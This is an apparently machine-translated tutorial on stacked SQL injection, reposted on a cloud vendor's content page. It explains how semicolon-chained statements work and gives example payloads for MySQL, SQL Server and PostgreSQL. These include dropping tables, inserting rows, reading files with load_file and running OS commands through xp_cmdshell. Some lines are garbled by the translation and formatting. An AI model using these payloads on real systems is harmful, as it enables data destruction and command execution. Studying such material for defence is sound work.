MySQL injected into the heavenly stacked injection

Source: Internet
Author: User

Part III/page-3 Stacked injection

Background-8 Stacked Injection

Stacked injections: Stack injection. From the meaning of the noun you can see that a bunch of SQL statements (multiple lines) should be executed together. And in the real use of the same, we know in MySQL, the main command line, the end of each statement plus; Represents the end of a statement. So we can think of whether it is possible to use multiple sentences together. This is called stacked injection.

Introduction to the principle of 0x01

In SQL, a semicolon (;) is used to represent the end of an SQL statement. Think of us in; After ending an SQL statement, continue to construct the next statement, will it be executed together? So the idea is to create a stack injection. and union injection (joint injection) is also the combination of two statements, what is the difference between the two? The difference is that the type of statement that the Union or union all executes is limited and can be used to execute a query statement, while a stack injection can execute arbitrary statements.

For example, the following example.

When the query is executed, the first one displays the query information, and the second one deletes the entire table.

Limitations of 0x02 Stacking injection

The limitation of stack injection is that not every environment can be executed, may be limited by the API or the database engine is not supported, of course, insufficient permissions can also explain why the attacker could not modify the data or invoke some programs.

Ps: This image is intercepted from the original text, because my personal test environment is php+mysql, can be executed, there is doubt about mysql/php. But the individual estimates the original author may have different reasons for my version.

Although we mentioned earlier that a stack query can execute arbitrary SQL statements, this injection is not perfect. In our web system, because the code usually returns only one query result, the second statement of the stack injection produces an error or the result can only be ignored, and we cannot see the return result on the front-end interface.

Therefore, when reading data, we recommend the use of Union (Union) injection. We also need to know some database related information such as table name, column name and so on before using stack injection.

0X03 Individual Database Instance Introduction

In this section, we describe the usage of several types of databases from a common database perspective. The basic operation of the database, adding and removing check and change. The basic operations for database-related stack injection are listed below.

MySQL Database

(1) Create a new table select * from the Users where Id=1;create table test like users;

?

Successful execution, let's see if we can create a new success table.

?

  1. Delete the new test table above select * from users where id=1;drop table test;

  2. Query data select * from users where id=1;select;

    Load File select * from Users where Id=1;select load_file (' c:/tmpupbbn.php ');

    ?

  3. Modify Data Select * from the users where Id=1;insert into users (Id,username,password)

    VALUES (' + ', ' new ', ' new ');

    ?

    ?

    ?

    SQL Server Database

  4. Add Data table Select* from Test; Createtable sc3 (SS CHAR(8));

  5. Delete data table Select* from Test; Droptable sc3;

    (3) query data Select 1,2,3;select * from test;

  6. Modify Data select * Span style= "Color:blue" >from test; Update test set name=< Span style= "color:red" > ' test ' where id= 3;

  7. Execution of the most important stored procedure in SQL Server

    Select * from Test where id=1; EXEC Master. xp_cmdshell ' ipconfig '

    ?

    Oracle Database

    As we have mentioned in the above introduction, Oracle cannot use stack injection and can see that when there are two statements on the same line, an error is made directly. Invalid character. The back will not go down to try.

    ?

    PostgreSQL database

  8. Create a new Table select * FROM User_test;create table User_data (id DATE);

    You can see that the User_data table has been built.

  9. Delete the new user_data table above select * from User_test;delete from User_data;

  10. Query data select * from User_test;select;

  11. Modify Data Select * FROM User_test;update user_test set name= ' modify ' where Name= ' Zhang San ';

    ?

    ?

MySQL injected into the heavenly stacked injection

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.